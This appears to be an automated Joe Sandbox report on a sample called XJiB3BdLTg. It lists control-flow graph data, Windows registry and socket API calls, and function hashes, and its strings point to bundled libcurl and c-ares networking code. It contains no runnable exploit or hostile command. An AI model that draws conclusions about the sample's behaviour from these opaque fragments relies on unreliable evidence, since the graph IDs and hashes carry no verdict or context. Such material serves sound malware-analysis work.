1110 289f31-289f35 1102->1110 1111 289cb1-289ccd call 27ea00 call 27e960 1102->1111 1103->1102 1121 289bc5-289bda call 286d60 1103->1121 1115 289f40-289f61 call 27ebf0 * 2 1110->1115 1116 289f37-289f3a 1110->1116 1130 289cfd-289d0e call 27e960 1111->1130 1131 289ccf 1111->1131 1115->1035 1116->1035 1116->1115 1121->1102 1129 289be0-289bf4 call 286200 call 2867e0 1121->1129 1129->1102 1149 289bfa-289c0b call 286320 1129->1149 1140 289d10 1130->1140 1141 289d53-289d55 1130->1141 1135 289cd1-289cec call 27e9f0 call 27e4a0 1131->1135 1154 289cee-289cfb call 27e9d0 1135->1154 1155 289d47-289d51 1135->1155 1144 289d12-289d2d call 27e9f0 call 27e4a0 1140->1144 1147 289e69-289e8e call 27ea40 call 27e440 1141->1147 1172 289d5a-289d6f call 27e960 1144->1172 1173 289d2f-289d3c call 27e9d0 1144->1173 1168 289e90-289e92 1147->1168 1169 289e94-289eaa call 27e3c0 1147->1169 1165 289c11-289c1c call 287b70 1149->1165 1166 289b75-289b86 call 27ea00 1149->1166 1154->1130 1154->1135 1161 289dca-289ddb call 27e960 1155->1161 1177 289ddd-289ddf 1161->1177 1178 289e2e-289e36 1161->1178 1165->1093 1191 289c22-289c33 call 27e960 1165->1191 1166->1093 1188 289f2d 1166->1188 1175 289eb3-289ec4 call 27e9c0 1168->1175 1196 28a04a-28a04c 1169->1196 1197 289eb0-289eb1 1169->1197 1192 289d71-289d73 1172->1192 1193 289dc2 1172->1193 1173->1144 1199 289d3e-289d42 1173->1199 1175->1035 1204 289eca-289ed0 1175->1204 1187 289e06-289e21 call 27e9f0 call 27e4a0 1177->1187 1184 289e38-289e3b 1178->1184 1185 289e3d-289e5b call 27ebf0 * 2 1178->1185 1184->1185 1194 289e5e-289e67 1184->1194 1185->1194 1224 289de1-289dee call 27ec80 1187->1224 1225 289e23-289e2c call 27eac0 1187->1225 1188->1110 1214 289c35 1191->1214 1215 289c66-289c75 call 2878a0 1191->1215 1202 289d9a-289db5 call 27e9f0 call 27e4a0 1192->1202 1193->1161 1194->1147 1194->1175 1207 28a04e-28a051 1196->1207 1208 28a057-28a070 call 27ebf0 * 2 1196->1208 1197->1175 1199->1147 1243 289d75-289d82 call 27ec80 1202->1243 1244 289db7-289dc0 call 27eac0 1202->1244 1212 289ee5-289ef2 call 27e9f0 1204->1212 1207->1049 1207->1208 1208->1089 1212->1035 1230 289ef8-289f0e call 27e440 1212->1230 1222 289c37-289c51 call 27e9f0 1214->1222 1235 289c7b-289c8f call 27e7c0 1215->1235 1236 28a011 1215->1236 1222->1093 1253 289c57-289c64 call 27e9d0 1222->1253 1246 289df1-289e04 call 27e960 1224->1246 1225->1246 1251 289f10-289f26 call 27e3c0 1230->1251 1252 289ed2-289edf call 27e9e0 1230->1252 1235->1093 1256 289c95-28a00e 1235->1256 1236->1098 1258 289d85-289d98 call 27e960 1243->1258 1244->1258 1246->1178 1246->1187 1251->1252 1270 289f28 1251->1270 1252->1035 1252->1212 1253->1215 1253->1222 1256->1236 1258->1193 1258->1202 1270->1049
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00289946
                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00289974
                                          • RegCloseKey.KERNELBASE(?), ref: 0028998B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                          • API String ID: 3677997916-4129964100
                                          • Opcode ID: 6f0ef4b9f8833045d1f6809c2d71dda190a3513ce3f3ed889fda4b2fba834558
                                          • Instruction ID: e4fd6e655ac34d3f69ed4de7de41ff5119f145c8139e1f0e612a90d318fb2572
                                          • Opcode Fuzzy Hash: 6f0ef4b9f8833045d1f6809c2d71dda190a3513ce3f3ed889fda4b2fba834558
                                          • Instruction Fuzzy Hash: C032C8B9925202ABEB11BF20AC42A2B7694AF55318F0C4474FD0D96293F731ED74DB63
                                          Function 001F8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1364 1f8b50-1f8b69 1365 1f8b6b-1f8b74 1364->1365 1366 1f8be6 1364->1366 1368 1f8beb-1f8bf2 1365->1368 1369 1f8b76-1f8b8d 1365->1369 1367 1f8be9 1366->1367 1367->1368 1370 1f8b8f-1f8ba7 call 1d6e40 1369->1370 1371 1f8bf3-1f8bfe call 1fa550 1369->1371 1378 1f8bad-1f8baf 1370->1378 1379 1f8cd9-1f8d16 SleepEx 1370->1379 1376 1f8de4-1f8def 1371->1376 1377 1f8c04-1f8c08 1371->1377 1382 1f8e8c-1f8e95 1376->1382 1383 1f8df5-1f8e19 call 1fa150 1376->1383 1380 1f8c0e-1f8c1d 1377->1380 1381 1f8dbd-1f8dc3 1377->1381 1384 1f8ca6-1f8cb0 1378->1384 1385 1f8bb5-1f8bb9 1378->1385 1394 1f8d18-1f8d20 1379->1394 1395 1f8d22 1379->1395 1389 1f8c1f-1f8c30 connect 1380->1389 1390 1f8c35-1f8c48 call 1fa150 1380->1390 1381->1367 1387 1f8e97-1f8e9c 1382->1387 1388 1f8f00-1f8f06 1382->1388 1418 1f8e1b-1f8e26 1383->1418 1419 1f8e88 1383->1419 1384->1379 1391 1f8cb2-1f8cb8 1384->1391 1385->1368 1393 1f8bbb-1f8bc2 1385->1393 1396 1f8edf-1f8eef call 1c78b0 1387->1396 1397 1f8e9e-1f8eb6 call 1d2a00 1387->1397 1388->1368 1389->1390 1424 1f8c4d-1f8c4f 1390->1424 1398 1f8cbe-1f8cd4 call 1fb180 1391->1398 1399 1f8ddc-1f8dde 1391->1399 1393->1368 1401 1f8bc4-1f8bcc 1393->1401 1403 1f8d26-1f8d39 1394->1403 1395->1403 1421 1f8ef2-1f8efc 1396->1421 1397->1396 1423 1f8eb8-1f8edd call 1d3410 * 2 1397->1423 1398->1376 1399->1367 1399->1376 1407 1f8bce-1f8bd2 1401->1407 1408 1f8bd4-1f8bda 1401->1408 1412 1f8d3b-1f8d3d 1403->1412 1413 1f8d43-1f8d61 call 1dd8c0 call 1fa150 1403->1413 1407->1368 1407->1408 1408->1368 1409 1f8bdc-1f8be1 1408->1409 1420 1f8dac-1f8db8 call 2050a0 1409->1420 1412->1399 1412->1413 1443 1f8d66-1f8d74 1413->1443 1427 1f8e2e-1f8e85 call 1dd090 call 204fd0 1418->1427 1428 1f8e28-1f8e2c 1418->1428 1419->1382 1420->1368 1421->1388 1423->1421 1425 1f8c8e-1f8c93 1424->1425 1426 1f8c51-1f8c58 1424->1426 1435 1f8c99-1f8c9f 1425->1435 1436 1f8dc8-1f8dd9 call 1fb100 1425->1436 1426->1425 1432 1f8c5a-1f8c62 1426->1432 1427->1419 1428->1419 1428->1427 1439 1f8c6a-1f8c70 1432->1439 1440 1f8c64-1f8c68 1432->1440 1435->1384 1436->1399 1439->1425 1445 1f8c72-1f8c8b call 2050a0 1439->1445 1440->1425 1440->1439 1443->1368 1448 1f8d7a-1f8d81 1443->1448 1445->1425 1448->1368 1452 1f8d87-1f8d8f 1448->1452 1455 1f8d9b-1f8da1 1452->1455 1456 1f8d91-1f8d95 1452->1456 1455->1368 1457 1f8da7 1455->1457 1456->1368 1456->1455 1457->1420
                                          APIs
                                          • connect.WS2_32(?,?,00000001), ref: 001F8C30
                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 001F8CF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: Sleepconnect
                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                          • API String ID: 238548546-879669977
                                          • Opcode ID: 77b028f39d585c489644e23dd7893d0f9aea7e843b7593cef102631dabd18421
                                          • Instruction ID: 5ee25620d72af15830a173a9abec697c27b0483a4ef55e5be03a03381aca3d2a
                                          • Opcode Fuzzy Hash: 77b028f39d585c489644e23dd7893d0f9aea7e843b7593cef102631dabd18421
                                          • Instruction Fuzzy Hash: 78B1C17060430AAFDB14CF24C885BB6B7E0AF55314F18852DE96D4B2D2DB71EC54C762
                                          Function 001C2F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1458 1c2f17-1c2f8c call 691af0 call 691ee0 1463 1c31c9-1c31cd 1458->1463 1464 1c2f91-1c2ff4 call 1c1619 RegOpenKeyExA 1463->1464 1465 1c31d3-1c31d6 1463->1465 1468 1c2ffa-1c300b 1464->1468 1469 1c31c5 1464->1469 1470 1c315c-1c31ac RegEnumKeyExA 1468->1470 1469->1463 1471 1c3010-1c3083 call 1c1619 RegOpenKeyExA 1470->1471 1472 1c31b2-1c31c2 RegCloseKey 1470->1472 1475 1c314e-1c3152 1471->1475 1476 1c3089-1c30d4 RegQueryValueExA 1471->1476 1472->1469 1475->1470 1477 1c313b-1c314b RegCloseKey 1476->1477 1478 1c30d6-1c3137 call 691dc0 call 691e50 call 691ee0 call 691cf0 call 691ee0 call 690250 1476->1478 1477->1475 1478->1477
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseEnumOpen
                                          • String ID: *z
                                          • API String ID: 1332880857-3975569452
                                          • Opcode ID: dc9319bf54cc4c553702d74e2d57fc953377af40f12bf83a079890cff356d559
                                          • Instruction ID: 59ff835b742a16e7ec742b48f6084a2e76644ffdccb172346461a2ae2b0a8244
                                          • Opcode Fuzzy Hash: dc9319bf54cc4c553702d74e2d57fc953377af40f12bf83a079890cff356d559
                                          • Instruction Fuzzy Hash: 9471A4B49043199FDB40DF69C98479EBBF0FF85308F10896DE89897311D7749A888F92
                                          Function 0028AA30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 377networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1491 28aa30-28aa64 1493 28aa6a-28aaa7 call 27e730 1491->1493 1494 28ab04-28ab09 1491->1494 1498 28aaa9-28aabd 1493->1498 1499 28ab0e-28ab13 1493->1499 1495 28ae80-28ae89 1494->1495 1501 28ab18-28ab50 1498->1501 1502 28aabf-28aac7 1498->1502 1500 28ae2e 1499->1500 1503 28ae30-28ae4a call 27ea60 call 27ebf0 1500->1503 1508 28ab58-28ab6d 1501->1508 1502->1500 1504 28aacd-28ab02 1502->1504 1516 28ae4c-28ae57 1503->1516 1517 28ae75-28ae7d 1503->1517 1504->1508 1510 28ab6f-28ab73 1508->1510 1511 28ab96-28abab socket 1508->1511 1510->1511 1513 28ab75-28ab8f 1510->1513 1511->1500 1515 28abb1-28abc5 1511->1515 1513->1515 1531 28ab91 1513->1531 1518 28abd0-28abed ioctlsocket 1515->1518 1519 28abc7-28abca 1515->1519 1524 28ae59-28ae5e 1516->1524 1525 28ae6e-28ae74 1516->1525 1517->1495 1521 28abef-28ac0a 1518->1521 1522 28ac10-28ac14 1518->1522 1519->1518 1520 28ad2e-28ad39 1519->1520 1529 28ad3b-28ad4c 1520->1529 1530 28ad52-28ad56 1520->1530 1521->1522 1537 28ae29 1521->1537 1526 28ac16-28ac31 1522->1526 1527 28ac37-28ac41 1522->1527 1524->1525 1532 28ae60-28ae6c 1524->1532 1525->1517 1526->1527 1526->1537 1535 28ac7a-28ac7e 1527->1535 1536 28ac43-28ac46 1527->1536 1529->1530 1529->1537 1530->1537 1538 28ad5c-28ad6b 1530->1538 1531->1500 1532->1517 1543 28ac80-28ac9b 1535->1543 1544 28ace7-28acfe 1535->1544 1540 28ac4c-28ac51 1536->1540 1541 28ad04-28ad08 1536->1541 1537->1500 1545 28ad70-28ad78 1538->1545 1540->1541 1551 28ac57-28ac78 1540->1551 1541->1520 1550 28ad0a-28ad28 setsockopt 1541->1550 1543->1544 1547 28ac9d-28acc1 1543->1547 1544->1541 1548 28ad7a-28ad7f 1545->1548 1549 28ada0-28adae connect 1545->1549 1552 28acc6-28acd7 1547->1552 1548->1549 1553 28ad81-28ad99 1548->1553 1554 28adb3-28adcf 1549->1554 1550->1520 1550->1537 1551->1552 1552->1537 1559 28acdd-28ace5 1552->1559 1553->1554 1560 28ae8a-28ae91 1554->1560 1561 28add5-28add8 1554->1561 1559->1541 1559->1544 1560->1503 1562 28adda-28addf 1561->1562 1563 28ade1-28adf1 1561->1563 1562->1545 1562->1563 1564 28ae0d-28ae12 1563->1564 1565 28adf3-28ae07 1563->1565 1566 28ae1a-28ae1c call 28af70 1564->1566 1567 28ae14-28ae17 1564->1567 1565->1564 1571 28aea8-28aead 1565->1571 1570 28ae21-28ae23 1566->1570 1567->1566 1572 28ae93-28ae9d 1570->1572 1573 28ae25-28ae27 1570->1573 1571->1503 1574 28aeaf-28aeb1 call 27e760 1572->1574 1575 28ae9f-28aea6 call 27e7c0 1572->1575 1573->1503 1579 28aeb6-28aebe 1574->1579 1575->1579 1580 28af1a-28af1f 1579->1580 1581 28aec0-28aedb call 27e180 1579->1581 1580->1503 1581->1503 1584 28aee1-28aeec 1581->1584 1585 28aeee-28aeff 1584->1585 1586 28af02-28af06 1584->1586 1585->1586 1587 28af08-28af0b 1586->1587 1588 28af0e-28af15 1586->1588 1587->1588 1588->1495
                                          APIs
                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0028AB9B
                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0028ABE4
                                          • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 0028AD20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: ioctlsocketsetsockoptsocket
                                          • String ID: ;m}
                                          • API String ID: 2067140946-697879304
                                          • Opcode ID: 6641b2833dbe50bb5e2fc92c9831eee19fff6417e8c4e84eee5f802020580bab
                                          • Instruction ID: d9cb4d0b73db79ac00c476e906ee6f142467c487dd4b7cd2fc459daedc9d8e5a
                                          • Opcode Fuzzy Hash: 6641b2833dbe50bb5e2fc92c9831eee19fff6417e8c4e84eee5f802020580bab
                                          • Instruction Fuzzy Hash: 0DE1E1746213029FEB20DF24C840B6A77A5FF85304F144A2EF9988B2D1EB75E964CB53
                                          Function 001F9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1590 1f9290-1f92ed call 1c76a0 1593 1f93c3-1f93ce 1590->1593 1594 1f92f3-1f92fb 1590->1594 1604 1f93e5-1f9427 call 1dd090 call 204f40 1593->1604 1605 1f93d0-1f93e1 1593->1605 1595 1f93aa-1f93af 1594->1595 1596 1f9301-1f9333 call 1dd8c0 call 1dd9a0 1594->1596 1597 1f9456-1f9470 1595->1597 1598 1f93b5-1f93bc 1595->1598 1614 1f93a7 1596->1614 1615 1f9335-1f9364 WSAIoctl 1596->1615 1602 1f93be 1598->1602 1603 1f9429-1f9431 1598->1603 1602->1597 1609 1f9439-1f943f 1603->1609 1610 1f9433-1f9437 1603->1610 1604->1597 1604->1603 1605->1598 1606 1f93e3 1605->1606 1606->1597 1609->1597 1613 1f9441-1f9453 call 2050a0 1609->1613 1610->1597 1610->1609 1613->1597 1614->1595 1618 1f939b-1f93a4 1615->1618 1619 1f9366-1f936f 1615->1619 1618->1614 1619->1618 1622 1f9371-1f9390 setsockopt 1619->1622 1622->1618 1623 1f9392-1f9395 1622->1623 1623->1618
                                          APIs
                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 001F935C
                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 001F9389
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: Ioctlsetsockopt
                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                          • API String ID: 1903391676-2691795271
                                          • Opcode ID: f2c70a565b54c6ada69b307275533276fbb48eadf130ca1abc0cc404ce2967b6
                                          • Instruction ID: 798cfa5cbc80f42fd438dc22ff4002942fd0382c691e41fec3c01ffd0dc6ef6b
                                          • Opcode Fuzzy Hash: f2c70a565b54c6ada69b307275533276fbb48eadf130ca1abc0cc404ce2967b6
                                          • Instruction Fuzzy Hash: 5E510574A04309AFE714EF24C881FBAB7A5FF94714F148529FE488B282E731E951CB91
                                          Function 001C76A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1624 1c76a0-1c76be 1625 1c76e6-1c76f2 send 1624->1625 1626 1c76c0-1c76c7 1624->1626 1628 1c775e-1c7762 1625->1628 1629 1c76f4-1c7709 call 1c72a0 1625->1629 1626->1625 1627 1c76c9-1c76d1 1626->1627 1630 1c770b-1c7759 call 1c72a0 call 1ccb20 call 548c50 1627->1630 1631 1c76d3-1c76e4 1627->1631 1629->1628 1630->1628 1631->1629
                                          APIs
                                          • send.WS2_32(multi.c,?,?,?,001C3D4E,00000000,?,?,001D07BF), ref: 001C76EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                          • API String ID: 2809346765-3388739168
                                          • Opcode ID: 6b076eb4a1f3e3c6352cc1d811fd140e7177f5dff9cf2224e4f7267090d44541
                                          • Instruction ID: 6b0c0dbdc32c6bae836ce11d61af2fd5459b868f4467ea544bd17e9a5465cc5a
                                          • Opcode Fuzzy Hash: 6b076eb4a1f3e3c6352cc1d811fd140e7177f5dff9cf2224e4f7267090d44541
                                          • Instruction Fuzzy Hash: B411ABF561D3547FE110AB549C8AF277B5CDBE2B68F45061CF80463282D795DC01C9B2
                                          Function 0054D1D0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
